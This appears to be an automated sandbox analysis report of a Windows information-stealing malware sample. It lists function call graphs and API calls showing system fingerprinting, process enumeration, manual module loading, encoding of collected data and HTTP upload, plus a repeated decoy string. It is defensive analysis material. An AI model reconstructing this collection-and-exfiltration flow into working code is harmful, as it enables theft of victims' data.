931590 lstrcpy 15386->15389 15390 9408ac 15387->15390 15391 94a7a0 lstrcpy 15388->15391 15393 9409f4 15389->15393 15394 94a920 3 API calls 15390->15394 15392 94083e 15391->15392 16090 93fb00 15392->16090 15396 94a7a0 lstrcpy 15393->15396 15397 9408b3 15394->15397 15398 940a0d 15396->15398 15399 94a9b0 4 API calls 15397->15399 15400 94a7a0 lstrcpy 15398->15400 15401 9408ba 15399->15401 15402 940a28 15400->15402 15403 94a8a0 lstrcpy 15401->15403 16206 940030 15402->16206 15405->13796 15416->15383 15738 94a7a0 lstrcpy 15737->15738 15739 931683 15738->15739 15740 94a7a0 lstrcpy 15739->15740 15741 931695 15740->15741 15742 94a7a0 lstrcpy 15741->15742 15743 9316a7 15742->15743 15744 94a7a0 lstrcpy 15743->15744 15745 9315a3 15744->15745 15745->14619 15747 9347c6 15746->15747 15748 934838 lstrlen 15747->15748 15772 94aad0 15748->15772 15750 934848 InternetCrackUrlA 15751 934867 15750->15751 15751->14696 15753 94a740 lstrcpy 15752->15753 15754 948b74 15753->15754 15755 94a740 lstrcpy 15754->15755 15756 948b82 GetSystemTime 15755->15756 15757 948b99 15756->15757 15758 94a7a0 lstrcpy 15757->15758 15759 948bfc 15758->15759 15759->14711 15761 94a931 15760->15761 15762 94a988 15761->15762 15764 94a968 lstrcpy lstrcat 15761->15764 15763 94a7a0 lstrcpy 15762->15763 15765 94a994 15763->15765 15764->15762 15765->14714 15766->14829 15768 934eee 15767->15768 15769 939af9 LocalAlloc 15767->15769 15768->14717 15768->14720 15769->15768 15770 939b14 CryptStringToBinaryA 15769->15770 15770->15768 15771 939b39 LocalFree 15770->15771 15771->15768 15772->15750 15773->14839 15774->14980 15775->14982 15776->14990 15905 9477a0 15777->15905 15780 9476c6 RegOpenKeyExA 15782 947704 RegCloseKey 15780->15782 15783 9476e7 RegQueryValueExA 15780->15783 15781 941c1e 15781->15072 15782->15781 15783->15782 15785 941c99 15784->15785 15785->15086 15787 941e09 15786->15787 15787->15128 15789 941e84 15788->15789 15790 947a9a wsprintfA 15788->15790 15789->15142 15790->15789 15792 941efe 15791->15792 15793 947b4d 15791->15793 15792->15156 15912 948d20 LocalAlloc CharToOemW 15793->15912 15796 94a740 lstrcpy 15795->15796 15797 947bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15796->15797 15805 947c25 15797->15805 15798 947c46 GetLocaleInfoA 15798->15805 15799 947d18 15800 947d1e LocalFree 15799->15800 15801 947d28 15799->15801 15800->15801 15802 94a7a0 lstrcpy 15801->15802 15804 947d37 15802->15804 15803 94a9b0 lstrcpy lstrlen lstrcpy lstrcat 15803->15805 15804->15169 15805->15798 15805->15799 15805->15803 15806 94a8a0 lstrcpy 15805->15806 15806->15805 15808 942008 15807->15808 15808->15184 15810 9494b5 15809->15810 15811 949493 GetModuleFileNameExA CloseHandle 15809->15811 15812 94a740 lstrcpy 15810->15812 15811->15810 15813 942091 15812->15813 15813->15199 15815 942119 15814->15815 15816 947e68 RegQueryValueExA 15814->15816 15815->15213 15817 947e8e RegCloseKey 15816->15817 15817->15815 15819 947fb9 GetLogicalProcessorInformationEx 15818->15819 15820 947fd8 GetLastError 15819->15820 15823 948029 15819->15823 15828 947fe3 15820->15828 15830 948022 15820->15830 15824 9489f0 2 API calls 15823->15824 15826 94807b 15824->15826 15825 9489f0 2 API calls 15827 942194 15825->15827 15829 948084 wsprintfA 15826->15829 15826->15830 15827->15227 15828->15819 15828->15827 15913 9489f0 15828->15913 15916 948a10 GetProcessHeap RtlAllocateHeap 15828->15916 15829->15827 15830->15825 15830->15827 15832 94220f 15831->15832 15832->15241 15834 9489b0 15833->15834 15835 94814d GlobalMemoryStatusEx 15834->15835 15838 948163 15835->15838 15836 94819b wsprintfA 15837 942289 15836->15837 15837->15255 15838->15836 15840 9487fb GetProcessHeap RtlAllocateHeap wsprintfA 15839->15840 15842 94a740 lstrcpy 15840->15842 15843 94230b 15842->15843 15843->15269 15845 94a740 lstrcpy 15844->15845 15849 948229 15845->15849 15846 948263 15848 94a7a0 lstrcpy 15846->15848 15847 94a9b0 lstrcpy lstrlen lstrcpy lstrcat 15847->15849 15850 9482dc 15848->15850 15849->15846 15849->15847 15851 94a8a0 lstrcpy 15849->15851 15850->15286 15851->15849 15853 94a740 lstrcpy 15852->15853 15854 94835c RegOpenKeyExA 15853->15854 15855 9483d0 15854->15855 15856 9483ae 15854->15856 15858 948613 RegCloseKey 15855->15858 15859 9483f8 RegEnumKeyExA 15855->15859 15857 94a7a0 lstrcpy 15856->15857 15861 9483bd 15857->15861 15860 94a7a0 lstrcpy 15858->15860 15862 94860e 15859->15862 15863 94843f wsprintfA RegOpenKeyExA 15859->15863 15860->15861 15861->15312 15862->15858 15864 948485 RegCloseKey RegCloseKey 15863->15864 15865 9484c1 RegQueryValueExA 15863->15865 15868 94a7a0 lstrcpy 15864->15868 15866 948601 RegCloseKey 15865->15866 15867 9484fa lstrlen 15865->15867 15866->15862 15867->15866 15869 948510 15867->15869 15868->15861 15870 94a9b0 4 API calls 15869->15870 15871 948527 15870->15871 15872 94a8a0 lstrcpy 15871->15872 15873 948533 15872->15873 15874 94a9b0 4 API calls 15873->15874 15875 948557 15874->15875 15876 94a8a0 lstrcpy 15875->15876 15877 948563 15876->15877 15878 94856e RegQueryValueExA 15877->15878 15878->15866 15879 9485a3 15878->15879 15880 94a9b0 4 API calls 15879->15880 15881 9485ba 15880->15881 15882 94a8a0 lstrcpy 15881->15882 15883 9485c6 15882->15883 15884 94a9b0 4 API calls 15883->15884 15885 9485ea 15884->15885 15886 94a8a0 lstrcpy 15885->15886 15887 9485f6 15886->15887 15887->15866 15889 94a740 lstrcpy 15888->15889 15890 9486bc CreateToolhelp32Snapshot Process32First 15889->15890 15891 94875d CloseHandle 15890->15891 15892 9486e8 Process32Next 15890->15892 15893 94a7a0 lstrcpy 15891->15893 15892->15891 15896 9486fd 15892->15896 15895 948776 15893->15895 15894 94a9b0 lstrcpy lstrlen lstrcpy lstrcat 15894->15896 15895->15344 15896->15892 15896->15894 15897 94a8a0 lstrcpy 15896->15897 15897->15896 15899 94a7a0 lstrcpy 15898->15899 15900 9451b5 15899->15900 15901 931590 lstrcpy 15900->15901 15902 9451c6 15901->15902 15917 935100 15902->15917 15904 9451cf 15904->15356 15908 947720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15905->15908 15907 9476b9 15907->15780 15907->15781 15909 947765 RegQueryValueExA 15908->15909 15910 947780 RegCloseKey 15908->15910 15909->15910 15911 947793 15910->15911 15911->15907 15912->15792 15914 948a0c 15913->15914 15915 9489f9 GetProcessHeap HeapFree 15913->15915 15914->15828 15915->15914 15916->15828 15918 94a7a0 lstrcpy 15917->15918 15919 935119 15918->15919 15920 9347b0 2 API calls 15919->15920 15921 935125 15920->15921 16077 948ea0 15921->16077 15923 935184 15924 935192 lstrlen 15923->15924 15925 9351a5 15924->15925 15926 948ea0 4 API calls 15925->15926 15927 9351b6 15926->15927 15928 94a740 lstrcpy 15927->15928 15929 9351c9 15928->15929 15930 94a740 lstrcpy 15929->15930 15931 9351d6 15930->15931 15932 94a740 lstrcpy 15931->15932 15933 9351e3 15932->15933 15934 94a740 lstrcpy 15933->15934 15935 9351f0 15934->15935 15936 94a740 lstrcpy 15935->15936 15937 9351fd InternetOpenA StrCmpCA 15936->15937 15938 93522f 15937->15938 15939 9358c4 InternetCloseHandle 15938->15939 15940 948b60 3 API calls 15938->15940 15946 9358d9 ctype 15939->15946 15941 93524e 15940->15941 15942 94a920 3 API calls 15941->15942 15943 935261 15942->15943 15944 94a8a0 lstrcpy 15943->15944 15945 93526a 15944->15945 15947 94a9b0 4 API calls 15945->15947 15950 94a7a0 lstrcpy 15946->15950 15948 9352ab 15947->15948 15949 94a920 3 API calls 15948->15949 15951 9352b2 15949->15951 15958 935913 15950->15958 15952 94a9b0 4 API calls 15951->15952 15953 9352b9 15952->15953 15954 94a8a0 lstrcpy 15953->15954 15955 9352c2 15954->15955 15956 94a9b0 4 API calls 15955->15956 15957 935303 15956->15957 15959 94a920 3 API calls 15957->15959 15958->15904 15960 93530a 15959->15960 15961 94a8a0 lstrcpy 15960->15961 15962 935313 15961->15962 15963 935329 InternetConnectA 15962->15963 15963->15939 15964 935359 HttpOpenRequestA 15963->15964 15966 9358b7 InternetCloseHandle 15964->15966 15967 9353b7 15964->15967 15966->15939 15968 94a9b0 4 API calls 15967->15968 15969 9353cb 15968->15969 15970 94a8a0 lstrcpy 15969->15970 15971 9353d4 15970->15971 15972 94a920 3 API calls 15971->15972 15973 9353f2 15972->15973 15974 94a8a0 lstrcpy 15973->15974 15975 9353fb 15974->15975 15976 94a9b0 4 API calls 15975->15976 15977 93541a 15976->15977 15978 94a8a0 lstrcpy 15977->15978 15979 935423 15978->15979 15980 94a9b0 4 API calls 15979->15980 15981 935444 15980->15981 15982 94a8a0 lstrcpy 15981->15982 15983 93544d 15982->15983 15984 94a9b0 4 API calls 15983->15984 15985 93546e 15984->15985 15986 94a8a0 lstrcpy 15985->15986 16078 948ead CryptBinaryToStringA 16077->16078 16079 948ea9 16077->16079 16078->16079 16080 948ece GetProcessHeap RtlAllocateHeap 16078->16080 16079->15923 16080->16079 16081 948ef4 ctype 16080->16081 16082 948f05 CryptBinaryToStringA 16081->16082 16082->16079 16086->15359 16329 939880 16087->16329 16089 9398e1 16089->15366 16091 94a740 lstrcpy 16090->16091 16092 93fb16 16091->16092 16264 94a740 lstrcpy 16263->16264 16265 940266 16264->16265 16266 948de0 2 API calls 16265->16266 16267 94027b 16266->16267 16268 94a920 3 API calls 16267->16268 16269 94028b 16268->16269 16270 94a8a0 lstrcpy 16269->16270 16271 940294 16270->16271 16272 94a9b0 4 API calls 16271->16272 16273 9402b8 16272->16273 16274 94a8a0 lstrcpy 16273->16274 16330 93988e 16329->16330 16333 936fb0 16330->16333 16332 9398ad ctype 16332->16089 16336 936d40 16333->16336 16337 936d63 16336->16337 16348 936d59 16336->16348 16337->16348 16350 936660 16337->16350 16339 936dbe 16339->16348 16356 9369b0 16339->16356 16341 936e2a 16342 936ee6 VirtualFree 16341->16342 16344 936ef7 16341->16344 16341->16348 16342->16344 16343 936f41 16347 9489f0 2 API calls 16343->16347 16343->16348 16344->16343 16345 936f26 FreeLibrary 16344->16345 16346 936f38 16344->16346 16345->16344 16349 9489f0 2 API calls 16346->16349 16347->16348 16348->16332 16349->16343 16355 93668f VirtualAlloc 16350->16355 16352 936730 16353 936743 VirtualAlloc 16352->16353 16354 93673c 16352->16354 16353->16354 16354->16339 16355->16352 16355->16354 16357 9369c9 16356->16357 16358 9369d5 16356->16358 16357->16358 16359 936a09 LoadLibraryA 16357->16359 16358->16341 16359->16358 16360 936a32 16359->16360 16363 936ae0 16360->16363 16366 948a10 GetProcessHeap RtlAllocateHeap 16360->16366 16362 936ba8 GetProcAddress 16362->16358 16362->16363 16363->16358 16363->16362 16364 9489f0 2 API calls 16364->16363 16365 936a8b 16365->16358 16365->16364 16366->16365

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 660 949860-949874 call 949750 663 949a93-949af2 LoadLibraryA * 5 660->663 664 94987a-949a8e call 949780 GetProcAddress * 21 660->664 666 949af4-949b08 GetProcAddress 663->666 667 949b0d-949b14 663->667 664->663 666->667 669 949b46-949b4d 667->669 670 949b16-949b41 GetProcAddress * 2 667->670 671 949b4f-949b63 GetProcAddress 669->671 672 949b68-949b6f 669->672 670->669 671->672 673 949b71-949b84 GetProcAddress 672->673 674 949b89-949b90 672->674 673->674 675 949bc1-949bc2 674->675 676 949b92-949bbc GetProcAddress * 2 674->676 676->675
                                APIs
                                • GetProcAddress.KERNEL32(74DD0000,015B2488), ref: 009498A1
                                • GetProcAddress.KERNEL32(74DD0000,015B2218), ref: 009498BA
                                • GetProcAddress.KERNEL32(74DD0000,015B2428), ref: 009498D2
                                • GetProcAddress.KERNEL32(74DD0000,015B2458), ref: 009498EA
                                • GetProcAddress.KERNEL32(74DD0000,015B22A8), ref: 00949903
                                • GetProcAddress.KERNEL32(74DD0000,015B9088), ref: 0094991B
                                • GetProcAddress.KERNEL32(74DD0000,015A5910), ref: 00949933
                                • GetProcAddress.KERNEL32(74DD0000,015A5810), ref: 0094994C
                                • GetProcAddress.KERNEL32(74DD0000,015B2470), ref: 00949964
                                • GetProcAddress.KERNEL32(74DD0000,015B2350), ref: 0094997C
                                • GetProcAddress.KERNEL32(74DD0000,015B2380), ref: 00949995
                                • GetProcAddress.KERNEL32(74DD0000,015B2338), ref: 009499AD
                                • GetProcAddress.KERNEL32(74DD0000,015A5790), ref: 009499C5
                                • GetProcAddress.KERNEL32(74DD0000,015B22F0), ref: 009499DE
                                • GetProcAddress.KERNEL32(74DD0000,015B2320), ref: 009499F6
                                • GetProcAddress.KERNEL32(74DD0000,015A5830), ref: 00949A0E
                                • GetProcAddress.KERNEL32(74DD0000,015B2368), ref: 00949A27
                                • GetProcAddress.KERNEL32(74DD0000,015B2398), ref: 00949A3F
                                • GetProcAddress.KERNEL32(74DD0000,015A59B0), ref: 00949A57
                                • GetProcAddress.KERNEL32(74DD0000,015B2410), ref: 00949A70
                                • GetProcAddress.KERNEL32(74DD0000,015A5930), ref: 00949A88
                                • LoadLibraryA.KERNEL32(015B2560,?,00946A00), ref: 00949A9A
                                • LoadLibraryA.KERNEL32(015B2590,?,00946A00), ref: 00949AAB
                                • LoadLibraryA.KERNEL32(015B2530,?,00946A00), ref: 00949ABD
                                • LoadLibraryA.KERNEL32(015B2548,?,00946A00), ref: 00949ACF
                                • LoadLibraryA.KERNEL32(015B2578,?,00946A00), ref: 00949AE0
                                • GetProcAddress.KERNEL32(75A70000,015B25A8), ref: 00949B02
                                • GetProcAddress.KERNEL32(75290000,015B25D8), ref: 00949B23
                                • GetProcAddress.KERNEL32(75290000,015B2518), ref: 00949B3B
                                • GetProcAddress.KERNEL32(75BD0000,015B25C0), ref: 00949B5D
                                • GetProcAddress.KERNEL32(75450000,015A5770), ref: 00949B7E
                                • GetProcAddress.KERNEL32(76E90000,015B90E8), ref: 00949B9F
                                • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00949BB6
                                Strings
                                • NtQueryInformationProcess, xrefs: 00949BAA
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: NtQueryInformationProcess
                                • API String ID: 2238633743-2781105232
                                • Opcode ID: 329633dcacb3b3647d993135872ae44ad131efc7eb65844a7f5a3408605b16f6
                                • Instruction ID: 4e3a645a52866a17abbc2a059fb9e18d62f8982cd02c3ee98246574011ed054a
                                • Opcode Fuzzy Hash: 329633dcacb3b3647d993135872ae44ad131efc7eb65844a7f5a3408605b16f6
                                • Instruction Fuzzy Hash: 01A10AB55042409FD3C8EFA8ED99A5E3BF9F7C8301714451AA61D832A4DE39A8C1DB53

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 764 9345c0-934695 RtlAllocateHeap 781 9346a0-9346a6 764->781 782 93474f-9347a9 VirtualProtect 781->782 783 9346ac-93474a 781->783 783->781
                                APIs
                                • RtlAllocateHeap.NTDLL(00000000), ref: 0093460E
                                • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0093479C
                                Strings
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009345DD
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00934734
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009346AC
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009345E8
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00934678
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0093477B
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00934617
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0093475A
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0093471E
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00934638
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009346B7
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009345C7
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009345D2
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00934643
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00934657
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0093466D
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009345F3
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00934770
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00934765
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00934683
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009346D8
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009346CD
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0093474F
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0093462D
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00934622
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0093473F
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00934713
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00934729
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00934662
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009346C2
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocateHeapProtectVirtual
                                • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                • API String ID: 1542196881-2218711628
                                • Opcode ID: 5cea6def1d68efaf62045111eacca6ccd3492b93c7fb45c137cd03cbeee3356b
                                • Instruction ID: a65070f6c72e54d76475ec6dea80746c26273720cd500ed69352cf13be8ed6f3
                                • Opcode Fuzzy Hash: 5cea6def1d68efaf62045111eacca6ccd3492b93c7fb45c137cd03cbeee3356b
                                • Instruction Fuzzy Hash: 364108607CB604EACE2CF7A7885FDDDBA567FC2F4AF51504BAC085A281CBB079844711

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 801 934880-934942 call 94a7a0 call 9347b0 call 94a740 * 5 InternetOpenA StrCmpCA 816 934944 801->816 817 93494b-93494f 801->817 816->817 818 934955-934acd call 948b60 call 94a920 call 94a8a0 call 94a800 * 2 call 94a9b0 call 94a8a0 call 94a800 call 94a9b0 call 94a8a0 call 94a800 call 94a920 call 94a8a0 call 94a800 call 94a9b0 call 94a8a0 call 94a800 call 94a9b0 call 94a8a0 call 94a800 call 94a9b0 call 94a920 call 94a8a0 call 94a800 * 2 InternetConnectA 817->818 819 934ecb-934ef3 InternetCloseHandle call 94aad0 call 939ac0 817->819 818->819 905 934ad3-934ad7 818->905 829 934f32-934fa2 call 948990 * 2 call 94a7a0 call 94a800 * 8 819->829 830 934ef5-934f2d call 94a820 call 94a9b0 call 94a8a0 call 94a800 819->830 830->829 906 934ae5 905->906 907 934ad9-934ae3 905->907 908 934aef-934b22 HttpOpenRequestA 906->908 907->908 909 934b28-934e28 call 94a9b0 call 94a8a0 call 94a800 call 94a920 call 94a8a0 call 94a800 call 94a9b0 call 94a8a0 call 94a800 call 94a9b0 call 94a8a0 call 94a800 call 94a9b0 call 94a8a0 call 94a800 call 94a9b0 call 94a8a0 call 94a800 call 94a920 call 94a8a0 call 94a800 call 94a9b0 call 94a8a0 call 94a800 call 94a9b0 call 94a8a0 call 94a800 call 94a920 call 94a8a0 call 94a800 call 94a9b0 call 94a8a0 call 94a800 call 94a9b0 call 94a8a0 call 94a800 call 94a9b0 call 94a8a0 call 94a800 call 94a9b0 call 94a8a0 call 94a800 call 94a920 call 94a8a0 call 94a800 call 94a740 call 94a920 * 2 call 94a8a0 call 94a800 * 2 call 94aad0 lstrlen call 94aad0 * 2 lstrlen call 94aad0 HttpSendRequestA 908->909 910 934ebe-934ec5 InternetCloseHandle 908->910 1021 934e32-934e5c InternetReadFile 909->1021 910->819 1022 934e67-934eb9 InternetCloseHandle call 94a800 1021->1022 1023 934e5e-934e65 1021->1023 1022->910 1023->1022 1024 934e69-934ea7 call 94a9b0 call 94a8a0 call 94a800 